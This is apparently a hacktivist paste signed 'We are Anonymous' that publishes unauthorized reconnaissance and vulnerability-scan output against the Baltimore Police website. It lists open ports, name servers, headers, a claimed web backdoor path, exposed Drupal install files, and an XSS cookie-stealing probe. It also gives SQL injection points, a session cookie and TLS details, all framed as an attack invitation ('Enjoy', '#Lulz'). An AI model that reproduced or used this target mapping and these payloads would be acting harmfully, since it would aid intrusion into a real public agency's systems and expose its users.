We are Anonymous
We are Legion
We do not ForGive
We do not ForGet
Expect us..

Rise of The Hacktivist....

Pentest of baltimorepolice.org @ 78% >>> Enjoy :))  #Lulz

http://www.baltimorepolice.org/
-----------------------------

Server Type:  nginx - IP Address: 23.253.170.199

scan report for www.baltimorepolice.org (23.253.170.199)
Host is up (0.071s latency).
PORT     STATE    SERVICE
22/tcp   open     ssh
80/tcp   open     http
443/tcp  open     https
-------------------------/

Name Servers
============/

ns87.worldnic.com:   207.204.40.144 -

scan report for 207.204.40.144
Host is up (0.035s latency).
PORT     STATE    SERVICE
53/tcp   open     domain
80/tcp   open     http
----

ns88.worldnic.com:   207.204.21.144 -

scan report for 207.204.21.144
Host is up (0.0078s latency).
PORT     STATE    SERVICE
80/tcp   open     http
-----------------------/

HTTP Headers for www.baltimorepolice.org
=========================================/

HTTP/1.1 200 OK
Cache-Control: public, max-age=86400
Content-Language: en
Content-Type: text/html; charset=utf-8
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Tue, 28 Apr 2015 19:05:12 GMT
Server: nginx
X-Drupal-Cache: HIT
X-Generator: Drupal 7 (http://drupal.org)
X-Pantheon-Endpoint: 36234664-8913-4aec-b6dd-0dd1f4642920
X-Pantheon-Styx-Hostname: styxf9257755
X-Powered-By: PHP/5.3.29
X-Styx-Build-Date: Tue Apr 28 03:42:27 UTC 2015
X-Styx-Build-Num: 942
X-Styx-Build-Sha: fd514102420d3e89eba15e69540af0a692649330
X-Styx-Req-Id: styx-f920cfb93db3f8f058d581ab467bdf8b
X-Styx-Version: StyxGo
Date: Wed, 29 Apr 2015 15:55:41 GMT
X-Varnish: 2782104623 2761980092
Age: 74982
Via: 1.1 varnish
Connection: close
Vary: Accept-Encoding, Cookie, Cookie
X-Pre-Strip-Debug: Location:
==============================================================/

http://www.baltimorepolice.org/robots.txt
----------------------------------------/

#
# robots.txt
User-agent: *
Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /themes/
# Files
Disallow: /CHANGELOG.txt
Disallow: /cron.php
Disallow: /INSTALL.mysql.txt
Disallow: /INSTALL.pgsql.txt
Disallow: /INSTALL.sqlite.txt
Disallow: /install.php
Disallow: /INSTALL.txt
Disallow: /LICENSE.txt
Disallow: /MAINTAINERS.txt
Disallow: /update.php
Disallow: /UPGRADE.txt
Disallow: /xmlrpc.php
# Paths (clean URLs)
Disallow: /admin/
Disallow: /comment/reply/
Disallow: /filter/tips/
Disallow: /node/add/
Disallow: /search/
Disallow: /user/register/
Disallow: /user/password/
Disallow: /user/login/
Disallow: /user/logout/
# Paths (no clean URLs)
Disallow: /?q=admin/
Disallow: /?q=comment/reply/
Disallow: /?q=filter/tips/
Disallow: /?q=node/add/
Disallow: /?q=search/
Disallow: /?q=user/password/
Disallow: /?q=user/register/
Disallow: /?q=user/login/
Disallow: /?q=user/logout/
====================================================================/

EXPLOITS: to www.baltimorepolice.org.
=====================================/

A web backdoor was found at: "http://www.baltimorepolice.org/user/locus.php"; this could indicate that the server was hacked.

GET http://www.baltimorepolice.org/user/locus.php HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/CHANGELOG.txt". Vulnerability description: "A changelog was found.

GET http://www.baltimorepolice.org/CHANGELOG.txt HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.mysql.txt". Vulnerability description: "Drupal installation file found."

GET http://www.baltimorepolice.org/INSTALL.mysql.txt HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.pgsql.txt". Vulnerability description: "Drupal installation file found."

GET http://www.baltimorepolice.org/INSTALL.pgsql.txt HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/xmlrpc.php". Vulnerability description: "xmlrpc.php was found.

GET http://www.baltimorepolice.org/xmlrpc.php HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/LICENSE.txt". Vulnerability description: "License file found may identify site software."

GET http://www.baltimorepolice.org/LICENSE.txt HTTP/1.1
Host: www.baltimorepolice.org
Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/install.php". Vulnerability description: "Drupal install.php file found.".

GET http://www.baltimorepolice.org/install.php HTTP/1.1
Host: www.baltimorepolice.org
Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/UPGRADE.txt". Vulnerability description: "Default file found.".

GET http://www.baltimorepolice.org/UPGRADE.txt HTTP/1.1
Host: www.baltimorepolice.org
Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/INSTALL.txt". Vulnerability description: "Default file found."

GET http://www.baltimorepolice.org/INSTALL.txt HTTP/1.1
Host: www.baltimorepolice.org
Cookie: SESSfb8d551c9b20fb4c11a3e7f9d1a295f3=dFYqGLhKQ87wQOOTRrBX3VHuUU_opYZnqf3tegLGA2M
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?topic=<script>alert(document.cookie)</script>%20". Vulnerability description:

GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?SqlQuery=test%20". Vulnerability description:

GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?pymembs=admin". Vulnerability description:

GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?IDAdmin=test". Vulnerability description:

GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?base=test%20". Vulnerability description:

GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/user/". Vulnerability description: "This might be interesting.

GET http://www.baltimorepolice.org/user/ HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/sitemap.xml". Vulnerability description: "This gives a nice listing of the site content."

GET http://www.baltimorepolice.org/sitemap.xml HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/index.php?module=My_eGallery". Vulnerability description: "My_eGallery prior to 3.1.1.g are vulnerable to a remote execution bug via SQL command injection."

GET http://www.baltimorepolice.org/index.php? HTTP/1.1
Host: www.baltimorepolice.org
----/
found a vulnerability at URL: "http://www.baltimorepolice.org/web.config". Vulnerability description: "ASP config file found.".

GET http://www.baltimorepolice.org/web.config HTTP/1.1
Host: www.baltimorepolice.org
----/
"X-Powered-By" header for this HTTP server is: "PHP/5.3.29"
--/
The URL "http://www.baltimorepolice.org/" has the following allowed methods: *, GET, HEAD, POST.
--/
The server header for the remote web server is: "nginx"
--/
The target site *has* a DNS wildcard configuration -- The contents of http://23.253.170.199 differ from the contents of http://www.baltimorepolice.org
--/
The remote web server seems to have a reverse proxy installed.
--/
[Manual verification required] The response body for a request with a trailing dot in the domain, and the response body without a trailing dot in the domain differ. This could indicate a misconfiguration in the virtual host settings. In some cases, this misconfiguration permits the attacker to read the source code of the web application

GET http://www.baltimorepolice.org HTTP/1.1
Host: www.baltimorepolice.org
----/
[Manual verification required] The response body for a request with a trailing dot in the domain, and the response body without a trailing dot in the domain differ. This could indicate a misconfiguration in the virtual host settings. In some cases, this misconfiguration permits the attacker to read the source code of the web application

GET http://www.baltimorepolice.org/install.php HTTP/1.1
Host: www.baltimorepolice.org
----/
Found 2 URLs and 11 different points of injection.
SQL
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="en-US")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="ru")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="en-US", language="zh-TW")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="en-US")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="ru")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="ru", language="zh-TW")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="en-US")
--
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="ru")
--
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-6REYT...", form_id="search_blo...", language_res="zh-TW", language="zh-TW")
--/
http://www.baltimorepolice.org/ | Method: POST | Parameters: (search_block_form="What are y...", form_build_id="form-XQlBj...", form_id="search_blo...")

=====================================================================/
[*]      CNAME www.baltimorepolice.org live-baltopd.pantheon.io
[*]      CNAME live-baltopd.pantheon.io styx-01.pantheon.io
[*]      A styx-01.pantheon.io 23.253.170.199
[*]      A styx-01.pantheon.io 192.237.244.66
[*]      A styx-01.pantheon.io 23.253.58.7
[*]      CNAME www.baltimorepolice.org live-baltopd.pantheon.io
[*]      CNAME live-baltopd.pantheon.io styx-01.pantheon.io
[*]      AAAA styx-01.pantheon.io 2001:4801:7825:101:be76:4eff:fe11:8f4f
[*]      AAAA styx-01.pantheon.io 2001:4801:7822:101:be76:4eff:fe10:959b
[*]      AAAA styx-01.pantheon.io 2001:4801:7824:102:be76:4eff:fe10:8f3a
======================================================================/

-----   www.baltimorepolice.org   -----

Host's addresses:
__________________

styx-01.pantheon.io                      5        IN    A        23.253.170.199
styx-01.pantheon.io                      5        IN    A        192.237.244.66
styx-01.pantheon.io                      5        IN    A        23.253.58.7
========================================================================/

23.253.170.199

17 site(s) hosted on ip 23.253.170.199
Location:   San Antonio,United States

    eaglecreek.com
    baltimorepolice.org
    perc.org
    the200acres.com
    goldmanprize.org
    servicesource.com
    newstatesman.com
    equalityontrial.com
    homeperformance.org
    hobostrom.com
    colt.net
    bpihomeowner.org
    insideclimatenews.org
    iescustomstaffing.com
    cdobs.com
    what-is-fracking.com
    revealnews.org
=================================================================/

Testing SSL server 23.253.170.199 on port 443
---------------------------------------------

Accepted  TLSv1  256 bits  AES256-SHA -
Accepted  TLSv1  128 bits  AES128-SHA -
Accepted  TLSv1  168 bits  DES-CBC3-SHA -

Prefered Server Cipher(s):
    TLSv1  128 bits  AES128-SHA

SSL Certificate:
    Version: 2
    Serial Number: -4294967295
    Signature Algorithm: sha256WithRSAEncryption
    Issuer: /C=US/O=DigiCert Inc/CN=DigiCert SHA2 Secure Server CA
    Not valid before: Sep 18 00:00:00 2014 GMT
    Not valid after: Nov 25 12:00:00 2015 GMT
    Subject: /C=US/ST=California/L=San Francisco/O=Pantheon Systems, Inc./CN=*.pantheon.io
    Public Key Algorithm: rsaEncryption
    RSA Public Key: (2048 bit)
      Modulus (2048 bit):
      Exponent: 65537 (0x10001)
    X509v3 Extensions:
      X509v3 Authority Key Identifier:
        keyid:0F:80:61:1C:82:31:61:D5:2F:28:E7:8D:46:38:B4:2C:E1:C6:D9:E2
      X509v3 Subject Key Identifier:
        53:89:42:63:7A:53:86:B9:25:90:BA:DE:C6:77:0A:E6:4F:70:DF:8E
      X509v3 Subject Alternative Name:
        DNS:*.pantheon.io, DNS:pantheon.io, DNS:*.gotpantheon.com, DNS:gotpantheon.com, DNS:*.getpantheon.com, DNS:getpantheon.com
      X509v3 Key Usage: critical
        Digital Signature, Key Encipherment
      X509v3 Extended Key Usage:
        TLS Web Server Authentication, TLS Web Client Authentication
      X509v3 CRL Distribution Points:
        URI:http://crl3.digicert.com/ssca-sha2-g3.crl
        URI:http://crl4.digicert.com/ssca-sha2-g3.crl
      X509v3 Certificate Policies:
        Policy: 2.16.840.1.114412.1.1
          CPS: https://www.digicert.com/CPS
      Authority Information Access:
        OCSP - URI:http://ocsp.digicert.com
        CA Issuers - URI:http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt
      X509v3 Basic Constraints: critical
        CA:FALSE

=============================================================================================//